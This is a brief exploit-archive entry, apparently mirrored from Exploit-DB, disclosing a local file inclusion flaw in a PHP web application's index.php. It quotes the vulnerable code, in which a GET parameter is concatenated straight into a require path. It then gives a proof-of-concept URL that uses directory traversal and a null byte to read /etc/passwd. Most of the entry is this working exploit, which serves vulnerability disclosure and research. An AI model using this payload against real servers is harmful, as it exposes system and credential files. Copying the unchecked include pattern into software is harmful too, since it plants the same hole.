exploit-db-mirror/platforms/php/webapps/14208.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

15 lines
442 B
Text
Executable file

: # Tested on: Linux os :
: # Greetz to : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
----------------------------------------------------------------------------
[+] file:index.php on line 75
[+] Code:
<?
else {
$module = $_GET['a'];
}
require 'modules/' . $module . '.php';
?>
[+] PoC:http://localhost/index.php?a=../../../../../etc/passwd%00